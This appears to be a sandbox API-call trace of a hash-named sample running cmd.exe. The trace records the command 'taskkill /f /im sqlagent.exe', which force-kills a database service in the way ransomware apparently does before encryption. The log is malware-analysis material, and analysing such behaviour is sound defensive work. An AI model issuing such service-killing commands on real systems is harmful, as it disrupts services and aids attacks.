GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0144.909] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.909] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.909] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.909] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.909] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.909] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.909] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.909] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.909] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.909] GetProcessHeap () returned 0x5b0000 [0144.909] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x44) returned 0x5b05c8 [0144.909] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.909] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0144.909] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0144.910] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5b0618 [0144.910] FindClose (in: hFindFile=0x5b0618 | out: hFindFile=0x5b0618) returned 1 [0144.910] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5b0618 [0144.910] FindClose (in: hFindFile=0x5b0618 | out: hFindFile=0x5b0618) returned 1 [0144.910] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0144.911] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5b0618 [0144.911] FindClose (in: hFindFile=0x5b0618 | out: hFindFile=0x5b0618) returned 1 [0144.911] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0144.911] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0144.911] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0144.911] GetProcessHeap () returned 0x5b0000 [0144.912] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5ba790) returned 1 [0144.912] GetEnvironmentStringsW () returned 0x5b7cc0* [0144.912] GetProcessHeap () returned 0x5b0000 [0144.912] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa76) returned 0x5b9d50 [0144.912] FreeEnvironmentStringsA (penv="=") returned 1 [0144.912] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.912] GetProcessHeap () returned 0x5b0000 [0144.912] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b05c8) returned 1 [0144.913] GetProcessHeap () returned 0x5b0000 [0144.913] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400e) returned 0x5bbc50 [0144.913] GetProcessHeap () returned 0x5b0000 [0144.913] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4c) returned 0x5ba7d0 [0144.914] GetProcessHeap () returned 0x5b0000 [0144.914] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4008) returned 0x5bfc68 [0144.914] GetProcessHeap () returned 0x5b0000 [0144.914] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4008) returned 0x5c3c78 [0144.916] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0144.917] GetProcessHeap () returned 0x5b0000 [0144.917] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x418) returned 0x5ba828 [0144.917] SetErrorMode (uMode=0x0) returned 0x8003 [0144.917] SetErrorMode (uMode=0x1) returned 0x0 [0144.917] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x5ba830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0144.917] SetErrorMode (uMode=0x8003) returned 0x1 [0144.917] GetProcessHeap () returned 0x5b0000 [0144.917] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5ba828, Size=0x7e) returned 0x5ba828 [0144.917] GetProcessHeap () returned 0x5b0000 [0144.917] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5ba828) returned 0x7e [0144.918] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0144.918] GetProcessHeap () returned 0x5b0000 [0144.918] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5ba8b0 [0144.918] GetProcessHeap () returned 0x5b0000 [0144.918] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb8) returned 0x5ba920 [0144.918] GetProcessHeap () returned 0x5b0000 [0144.918] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5ba920, Size=0x62) returned 0x5ba920 [0144.918] GetProcessHeap () returned 0x5b0000 [0144.918] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5ba920) returned 0x62 [0144.918] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.918] GetProcessHeap () returned 0x5b0000 [0144.918] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe0) returned 0x5ba990 [0144.924] GetProcessHeap () returned 0x5b0000 [0144.924] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5ba990, Size=0x76) returned 0x5ba990 [0144.924] GetProcessHeap () returned 0x5b0000 [0144.924] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5ba990) returned 0x76 [0144.924] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.927] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im sqlagent.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0144.927] GetLastError () returned 0x3 [0144.927] GetProcessHeap () returned 0x5b0000 [0144.928] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bfc68) returned 1 [0144.928] GetProcessHeap () returned 0x5b0000 [0144.928] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c3c78) returned 1 [0144.928] GetProcessHeap () returned 0x5b0000 [0144.929] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbc50) returned 1 [0144.929] GetConsoleOutputCP () returned 0x1b5 [0144.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.932] GetUserDefaultLCID () returned 0x409 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0144.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0144.933] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.935] GetProcessHeap () returned 0x5b0000 [0144.935] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20c) returned 0x5baa58 [0144.936] GetConsoleTitleW (in: lpConsoleTitle=0x5baa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.939] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0144.939] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0144.939] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0144.939] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0144.939] GetProcessHeap () returned 0x5b0000 [0144.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbc50 [0144.939] GetProcessHeap () returned 0x5b0000 [0144.940] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbc50) returned 1 [0144.941] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0144.941] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0144.941] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0144.941] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0144.941] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0144.941] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0144.941] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0144.941] GetProcessHeap () returned 0x5b0000 [0144.941] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5bac70 [0144.941] GetProcessHeap () returned 0x5b0000 [0144.941] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5b0578 [0144.942] GetProcessHeap () returned 0x5b0000 [0144.942] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x34) returned 0x5bacd0 [0144.943] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.946] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0144.946] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0144.946] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0144.946] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0144.946] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0144.946] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0144.946] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0144.946] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0144.946] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0144.946] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0144.946] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0144.946] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0144.946] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0144.946] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0144.946] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0144.947] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0144.947] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0144.947] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0144.947] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0144.947] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0144.947] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0144.947] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0144.947] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0144.947] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0144.947] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0144.947] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0144.947] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0144.947] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0144.947] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0144.947] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0144.947] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0144.947] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0144.947] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0144.947] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0144.947] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0144.947] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0144.947] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0144.947] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0144.948] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0144.948] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0144.948] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0144.948] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0144.948] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0144.948] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0144.948] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0144.948] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0144.948] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0144.948] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0144.948] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0144.948] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0144.948] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0144.948] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0144.948] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0144.948] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0144.948] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0144.948] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0144.948] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0144.948] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0144.948] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0144.948] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0144.948] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0144.948] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0144.948] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0144.949] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0144.949] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0144.949] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0144.949] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0144.949] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0144.949] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0144.949] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0144.949] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0144.949] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0144.949] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0144.949] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0144.949] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0144.949] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0144.949] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0144.949] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0144.949] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0144.949] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0144.949] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0144.949] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0144.949] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0144.949] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0144.949] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0144.949] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0144.950] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0144.950] GetProcessHeap () returned 0x5b0000 [0144.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5bad10 [0144.950] GetProcessHeap () returned 0x5b0000 [0144.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x46) returned 0x5baf28 [0144.950] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0144.951] GetProcessHeap () returned 0x5b0000 [0144.951] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x418) returned 0x5b05c8 [0144.951] SetErrorMode (uMode=0x0) returned 0x8003 [0144.951] SetErrorMode (uMode=0x1) returned 0x0 [0144.951] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5b05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0144.951] SetErrorMode (uMode=0x8003) returned 0x1 [0144.951] GetProcessHeap () returned 0x5b0000 [0144.951] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5b05c8, Size=0x56) returned 0x5b05c8 [0144.951] GetProcessHeap () returned 0x5b0000 [0144.951] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5b05c8) returned 0x56 [0144.951] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0144.951] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.951] GetProcessHeap () returned 0x5b0000 [0144.952] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x110) returned 0x5baf78 [0144.952] GetProcessHeap () returned 0x5b0000 [0144.952] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x218) returned 0x5b0628 [0144.959] GetProcessHeap () returned 0x5b0000 [0144.959] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5b0628, Size=0x112) returned 0x5b0628 [0144.959] GetProcessHeap () returned 0x5b0000 [0144.959] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5b0628) returned 0x112 [0144.959] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.959] GetProcessHeap () returned 0x5b0000 [0144.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe0) returned 0x5bb090 [0144.961] GetProcessHeap () returned 0x5b0000 [0144.961] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5bb090, Size=0x76) returned 0x5bb090 [0144.961] GetProcessHeap () returned 0x5b0000 [0144.961] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5bb090) returned 0x76 [0144.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.961] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0144.962] GetLastError () returned 0x2 [0144.962] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.962] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5bb110 [0144.963] GetProcessHeap () returned 0x5b0000 [0144.963] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x14) returned 0x5b75c8 [0144.963] FindClose (in: hFindFile=0x5bb110 | out: hFindFile=0x5bb110) returned 1 [0144.963] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0144.963] GetLastError () returned 0x2 [0144.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5bb110 [0144.964] GetProcessHeap () returned 0x5b0000 [0144.964] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5b75c8, Size=0x4) returned 0x5bb150 [0144.964] FindClose (in: hFindFile=0x5bb110 | out: hFindFile=0x5bb110) returned 1 [0144.964] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0144.964] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0144.964] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.966] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0144.966] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0144.966] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0144.966] GetProcessHeap () returned 0x5b0000 [0144.966] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5b7588 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0144.966] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0144.967] 